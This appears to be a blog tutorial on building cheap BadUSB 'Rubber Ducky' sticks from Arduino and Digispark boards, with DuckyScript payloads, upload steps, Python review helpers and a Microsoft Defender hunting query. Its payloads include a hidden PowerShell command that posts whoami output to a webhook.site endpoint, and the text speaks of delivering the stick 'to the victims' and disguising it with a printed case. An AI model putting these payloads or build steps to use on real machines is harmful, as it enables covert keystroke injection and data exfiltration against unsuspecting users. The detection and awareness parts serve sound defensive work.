
Bad USB - Rubber Duckies

Disclaimer: Please use the information below responsibly. The aim is to educate users about the potential dangers posed by BAD USB devices and to promote cybersecurity awareness. This knowledge should only be applied in ethical contexts, such as authorized penetration testing or educational settings, and not for malicious purposes. Always seek explicit permission before testing in environments that are not your own, as unauthorized use can have serious legal consequences.

In this article, I will guide you through the process of creating your own BAD USB stick, commonly referred to as a Rubber Ducky. Additionally, I will demonstrate how to set up a custom detection rule in Microsoft Defender to monitor and identify whenever these devices are plugged into your system.

How to Create Your Own Bad USB Stick (Rubber Ducky)

What is a Rubber Ducky?

Rubber Ducky devices are highly effective tools that computers recognize as standard keyboards. This capability allows them to execute commands just as a user would, but at astonishing speed: around 1000 words per minute can be injected. The potential damage caused by such BAD USB sticks can be significant, as they can be used for various malicious activities, including but not limited to:

  • Exfiltration of Sensitive Data: Capture and send important data outside the target environment.

  • Establishing a Reverse Shell: Create a backdoor that provides remote access to an attacker.

  • Downloading Malicious Files: Retrieve harmful software from the internet onto the target machine.

  • Launching Attacks: Initiate attacks that could lead to ransomware incidents.

While Hak5 offers pre-made BAD USB devices for $80, this documentation will guide you on how to create your own BAD USB device for just $15.

Conducting a Red Team Exercise

I will also demonstrate how to conduct a red team exercise designed to enhance user awareness regarding security best practices. This exercise will involve simulating the use of BAD USB devices to identify potential vulnerabilities within your organization.

Additionally, I will explain how to create a custom detection rule in Microsoft Defender. This rule will alert you whenever BAD USB devices are connected to your network, helping to bolster your security posture and enabling you to respond swiftly to potential threats.

Required Materials

To get started, you will need the following materials:

  • BAD USB Device: A suitable option is a pre-made BAD USB device available for approximately €15 on Amazon. This device is based on an Arduino microcontroller and comes housed in a USB casing.

    • Link to Bad USB Devices on Amazon.

  • Digispark Device: For a more budget-friendly alternative, consider using a Digispark development board, which can be purchased for around €5. You can create your own USB casing to house the board.

    • Link to Digispark on Amazon.

Required resources

  • Duckify: This fantastic tool allows you to convert your Rubber Ducky code into Arduino or Digispark C code. One of its standout features is the ability to select your keyboard layout, which is crucial. Choosing the correct keyboard layout ensures that the keystrokes are accurately transmitted in the environment where the BAD USB device will be used; otherwise, it may result in unintended commands. Visit Duckify

  • AI Code Generation: Leverage artificial intelligence to create custom Rubber Ducky code tailored to your specific needs. After generating your code, you can convert it to Arduino or Digispark C code using the Duckify tool.

  • Webhook Site: This service allows you to generate free, unique URLs and email addresses to capture data. You can view everything sent to these endpoints instantly, making it useful for testing your payloads. Visit Webhook.site

  • Digispark USB Cases: If you need a housing solution for your Digispark device, you can find various USB casing designs on Thingiverse. View Digispark USB Cases

Required software

To start, install the Arduino IDE on your computer. This will equip you with the tools needed to upload code to your Arduino or Digispark device.

Optional: If you chose the Digispark development board instead of a BAD USB stick, follow these additional steps:

1. Download Digispark Drivers

To ensure your Digispark device is recognized by your system, download and install the necessary Windows drivers from this GitHub repository: Download Digispark Drivers. Run either DPinst64.exe or DPinst.exe, depending on your CPU architecture, or run install drivers.exe, which should detect your CPU architecture automatically.

2. Load Digispark Library in Arduino IDE

To load the Digispark library in the Arduino IDE:

  • Go to Preferences in the IDE.

  • Find Additional Boards Manager URLs and add the following link: https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json

3. Install Digistump AVR Boards

After adding the URL, install the Digistump AVR Boards from the Arduino Board Manager.

Rubber Ducky Code

Now that our environment is set up, let’s explore some examples of Rubber Ducky scripts for our BAD USB device.

You can utilize the Duckify tool to convert your Rubber Ducky script into Arduino or Digispark C code.

If your operating system is slower, consider increasing the DELAY between operations to allow for a pause in milliseconds before each keystroke injection. Adjust the value as needed.

In this example, we display a green full-screen message in Command Prompt, with some ASCII art, reading: "Lucky for you, this was a red team exercise conducted by your cyber team, simulating a ransomware attack via an USB. This exercise highlights the potential risks posed by real malicious actors. The consequences could have been much worse, potentially leading to the encryption of your entire disk! Never plug unknown devices to your machine!!"

The victim sees that message as soon as the BadUSB is plugged in. The script that produces it:

DELAY 500
REM Open Command Prompt
GUI r
DELAY 500
STRING cmd.exe
ENTER
DELAY 500
ALT ENTER
DELAY 500
STRING color 0A && echo    _ && echo  "/     \" && echo "| () () |" && echo  "\  ^  /" && echo   "|||||" && echo   "|||||" && echo  Lucky for you, this was a red team exercise conducted by your cyber team, simulating a ransomware attack via an USB. This exercise highlights the potential risks posed by real malicious actors. The consequences could have been much worse, potentially leading to the encryption of your entire disk! Never plug unknown devices to your machine!!
ENTER


This Rubber Ducky example will send the output of the whoami command to a webhook.

DELAY 500
REM Open Run dialog
GUI r
DELAY 300
REM Start PowerShell in hidden mode to send the whoami output
STRING powershell -NoProfile -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://webhook.site/50a8add4-5475-4cb1-9fd3-2512aa9b93ac' -Method POST -Body (whoami)}"
ENTER

This code will send "hello" to our Webhook and display "You have been hacked!" in a maximized PowerShell window on the user's screen.

DELAY 500
REM Open Run dialog
GUI r
DELAY 300
REM Start PowerShell in hidden mode to send "hello" to the webhook
STRING powershell -NoProfile -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://webhook.site/50a8add4-5475-4cb1-9fd3-2512aa9b93ac' -Method POST -Body (echo hello)}"
ENTER
DELAY 1000
REM Open a new PowerShell window to display the message
GUI r
DELAY 300
REM -NoExit must be passed to the new powershell.exe, not to Write-Host, or the window closes immediately
STRING powershell -NoProfile -Command "Start-Process PowerShell -ArgumentList '-NoExit','-Command','Write-Host \"You have been hacked!\"' -WindowStyle Maximized"
ENTER
DELAY 500
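Before a script goes onto a board for an exercise, it is worth knowing exactly what it will type, which key combinations it presses, which URLs it contacts and how much time its DELAY lines add up to. The following dry-run parser is an added example and not part of the original page or of the Duckify tool; it understands the DuckyScript subset used in the scripts above (DELAY, REM, STRING, GUI, ALT and single keys such as ENTER), and the sample script it runs over is constructed here with a placeholder URL.

```python
"""Dry-run summary of a DuckyScript file (added example, not the page's own code).

Lists what the script types, which key combinations it presses, which URLs appear in
the typed text, and how long the DELAY lines add up to. Only the command subset used
on this page (plus a few common keys) is recognised; anything else is reported as an
error so a reviewer notices it.
"""
import re
from dataclasses import dataclass, field

MODIFIER_KEYS = {"GUI", "WINDOWS", "ALT", "CTRL", "CONTROL", "SHIFT"}
SINGLE_KEYS = {"ENTER", "TAB", "ESC", "ESCAPE", "SPACE", "DELETE", "BACKSPACE",
               "UP", "DOWN", "LEFT", "RIGHT", "UPARROW", "DOWNARROW"}
URL_RE = re.compile(r"https?://[^\s'\"()]+")


@dataclass
class DuckySummary:
    total_delay_ms: int = 0          # sum of all DELAY lines
    keystrokes: int = 0              # one per STRING character, one per key combo
    typed_strings: list = field(default_factory=list)
    key_combos: list = field(default_factory=list)
    comments: list = field(default_factory=list)
    errors: list = field(default_factory=list)

    def urls(self):
        """External endpoints mentioned in typed text: the first thing a reviewer checks."""
        found = []
        for text in self.typed_strings:
            found.extend(URL_RE.findall(text))
        return found


def parse_ducky(script: str) -> DuckySummary:
    s = DuckySummary()
    for lineno, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "REM":                        # comment, nothing is typed
            s.comments.append(arg)
        elif cmd == "DELAY":                    # pause in milliseconds
            if arg.isdigit():
                s.total_delay_ms += int(arg)
            else:
                s.errors.append(f"line {lineno}: DELAY needs a number, got {arg!r}")
        elif cmd == "STRING":                   # typed verbatim, one keystroke per character
            s.typed_strings.append(arg)
            s.keystrokes += len(arg)
        elif cmd in MODIFIER_KEYS or cmd in SINGLE_KEYS:
            s.key_combos.append(line.upper())   # e.g. "GUI R", "ALT ENTER", "ENTER"
            s.keystrokes += 1
        else:
            s.errors.append(f"line {lineno}: unknown command {cmd!r}")
    return s


def report(script: str) -> str:
    """Human-readable summary for a script review."""
    s = parse_ducky(script)
    lines = [f"DELAY total: {s.total_delay_ms} ms",
             f"keystrokes:  {s.keystrokes}",
             f"key combos:  {', '.join(s.key_combos)}",
             f"urls:        {', '.join(s.urls()) or '(none)'}"]
    lines += [f"types:       {t}" for t in s.typed_strings]
    lines += [f"ERROR:       {e}" for e in s.errors]
    return "\n".join(lines)


# Constructed sample in the shape of the awareness script above; the URL is a placeholder.
SAMPLE_SCRIPT = """\
DELAY 500
REM Open the Run dialog
GUI r
DELAY 300
STRING cmd.exe
ENTER
DELAY 500
ALT ENTER
STRING echo Lucky for you, this was an awareness exercise. See https://awareness.example/badusb
ENTER
"""

if __name__ == "__main__":
    print(report(SAMPLE_SCRIPT))
```

Running it on the sample prints the 1300 ms of pauses, the four key combinations, the two typed strings and the single URL; a `DELAY` with a non-numeric argument or an unrecognised command shows up as an ERROR line rather than being silently skipped.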

Convert Rubber Ducky code to Arduino or Digispark code

After creating or selecting your Rubber Ducky code from the previous examples, use the Duckify resource to convert it into Arduino or Digispark C code.

  1. Navigate to the Duckify tool.

  2. Paste your Rubber Ducky code.

  3. Select your system, keyboard layout and mode (Arduino or Digispark).

  4. Click Convert.

After conversion, copy the output into your Arduino sketch. We will cover the process of uploading to Digispark or BAD USB devices in the next section.

Push Your BadUSB Script to Your USB Device

In this section, we’ll explain how to upload your BadUSB script to either an Arduino or a Digispark device.

BadUSB Device

If you are using a BAD USB device, follow these instructions:

  1. Convert your Rubber Ducky script to Arduino code using the Duckify resource.

  2. Open the Arduino IDE.

  3. Navigate to File > New Sketch.

  4. Plug in your BAD USB device.

  5. Select the Arduino Micro board in the Arduino IDE.

  6. Paste the C code that you converted using the Duckify resource.

  7. Click the Upload button to upload the sketch to your BAD USB Arduino device.

  8. Once the code is successfully uploaded to your BAD USB Arduino board, you should see the following message on the screen:

Congratulations! You have successfully created your own BAD USB device. Now, all you need to do is deliver it to the victims.

Digispark device

If you have chosen the Digispark development board, follow these steps to upload your code:

  1. Prepare for Upload: Once the Digispark is plugged in, you have 60 seconds to push the code before any scripts execute. Do not plug it in until instructed by the Arduino IDE.

  2. Open a New Sketch: In the Arduino IDE, go to File > New Sketch.

  3. Select the Digispark Board: Navigate to Tools > Board and select Digistump AVR Boards, then choose Digispark (Default - 16.5 MHz).

  4. Convert Your Code: Convert your Rubber Ducky code to Digispark mode using the Duckify resource.

  5. Paste Your Code: Paste the converted code into the new sketch in the Arduino IDE.

  6. Upload Your Code: Click the Upload button before plugging in your device! The Arduino IDE will notify you when to connect the Digispark. You will have 60 seconds to complete the operation from that moment.

  7. After plugging in the device, the code will be uploaded, and you should see the following message in the output if the operation was successful:

Congratulations! You have successfully created your BAD USB device using the Digistump development boards. For a more authentic appearance, you can print a 3D USB case to make it look like a real USB stick:

Detect the Bad USB device on Windows

This section outlines the steps to gather the DeviceID of USB devices on Windows, specifically BAD USB devices, to facilitate monitoring and identification of users who plug them in.

  1. To monitor USB devices, we first need to identify the DeviceID of the BAD USB devices. You can do this with the following PowerShell command, which lists every HID-class device with its DeviceID, friendly name and status:

Get-PnpDevice | Where-Object { $_.Class -like "HIDClass" } | Select-Object DeviceID, FriendlyName, Status

    1. Status "OK": Indicates the device is currently plugged in.

    2. Status "Unknown": Indicates the device is not plugged in.

  2. Once the BAD USB device is connected, it will appear in Windows Device Manager with an "OK" status. If the device is unplugged, the DeviceID remains in Device Manager, but the status changes to "Unknown."

This behavior enables a blue team member to create a detection rule based on the DeviceID, facilitating the identification of users who have plugged in the BAD USB device.

  3. To identify all instances of the BAD USB devices across your environment, you can create a hunting detection rule in Microsoft Defender. This is especially useful during red team exercises, allowing you to track the usage of BAD USB sticks and educate the users involved.

Example Hunting query:

DeviceEvents
| where AdditionalFields contains @"HID\\VID_16C0&PID_27DB\\6&2cb84562&0&0000"
   or AdditionalFields contains @"USB\\VID_2341&PID_8037&MI_02\\6&62fe806&0&0002"
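The query above matches the full instance IDs of two specific sticks, so it only fires for those exact devices. A blue team usually wants the broader check: any device whose VID/PID belongs to a board family used for BadUSB sticks, whichever serial it carries. The Python below is an added example (not code from the page or from Microsoft Defender): it parses Windows device instance IDs into bus, VID, PID, interface and instance path, matches them against a VID/PID watchlist built from the two pairs in the page's query (the labels are my reading of which board each pair belongs to), runs that over a constructed Get-PnpDevice table, and builds the equivalent VID/PID-based hunting filter.

```python
"""Watchlist check for BadUSB board families by USB VID/PID (added example).

Parses Windows PnP instance IDs such as
    HID\\VID_16C0&PID_27DB\\6&2cb84562&0&0000
    USB\\VID_2341&PID_8037&MI_02\\6&62fe806&0&0002
and flags any device whose vendor/product pair is on the watchlist, regardless of
the serial/instance part, so every board of the same family is caught.
"""
import re

INSTANCE_RE = re.compile(
    r"^(?P<bus>HID|USB)\\VID_(?P<vid>[0-9A-F]{4})&PID_(?P<pid>[0-9A-F]{4})"
    r"(?:&MI_(?P<mi>[0-9A-F]{2}))?\\(?P<instance>.+)$", re.IGNORECASE)

# (VID, PID) pairs taken from the page's Defender hunting query; labels are assumptions
# about which of the two boards described on the page each pair corresponds to.
WATCHLIST = {
    ("16C0", "27DB"): "Digispark keyboard",
    ("2341", "8037"): "Arduino Micro",
}


def parse_instance_id(device_id: str):
    """Split an instance ID into its parts, or return None if it is not HID/USB shaped."""
    m = INSTANCE_RE.match(device_id.strip())
    if not m:
        return None
    d = m.groupdict()
    return {"bus": d["bus"].upper(), "vid": d["vid"].upper(), "pid": d["pid"].upper(),
            "interface": d["mi"], "instance": d["instance"]}


def classify(device_id: str):
    """Return the watchlist label for this device, or None if it is not watchlisted."""
    parsed = parse_instance_id(device_id)
    if parsed is None:
        return None
    return WATCHLIST.get((parsed["vid"], parsed["pid"]))


def scan_pnp_table(text: str):
    """Run over the table printed by
        Get-PnpDevice | Select-Object DeviceID, FriendlyName, Status
    (one device per line, DeviceID first, Status last) and return
    (device_id, label, status) for every watchlisted device."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or not parts[0].upper().startswith(("HID\\", "USB\\")):
            continue                      # header, separator line, or unrelated text
        device_id, status = parts[0], parts[-1]
        label = classify(device_id)
        if label:
            hits.append((device_id, label, status))
    return hits


def kql_watchlist_clause() -> str:
    """Hunting filter on VID/PID instead of a full instance ID. The VID_/PID_ fragment
    contains no backslash, so the JSON escaping in AdditionalFields does not matter."""
    terms = [f'AdditionalFields contains "VID_{vid}&PID_{pid}"'
             for vid, pid in sorted(WATCHLIST)]
    return "DeviceEvents\n| where " + "\n   or ".join(terms)


# Constructed sample in the shape of Get-PnpDevice's output; the serials and instance
# paths are made up, only the VID/PID values match the page's query.
SAMPLE_PNP = """\
DeviceID                                          FriendlyName              Status
--------                                          ------------              ------
HID\\VID_046D&PID_C52B&MI_00\\7&1a2b3c4d&0&0000   HID Keyboard Device       OK
HID\\VID_16C0&PID_27DB\\6&aaaa1111&0&0000         HID Keyboard Device       Unknown
USB\\VID_2341&PID_8037&MI_02\\6&bbbb2222&0&0002   USB Input Device          OK
"""

if __name__ == "__main__":
    for device_id, label, status in scan_pnp_table(SAMPLE_PNP):
        print(f"{label:20} {status:8} {device_id}")
    print(kql_watchlist_clause())
```

On the sample table the ordinary keyboard (VID 046D) is ignored while the Digispark entry is reported with status Unknown (unplugged, ID still present) and the Arduino Micro entry with status OK (currently connected). Matching on VID/PID rather than the full instance ID is broader: any device with a Digispark or Arduino Micro chip, including legitimate development boards, will also match, so treat a hit as a trigger for a look at the user and the timing rather than as proof on its own.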
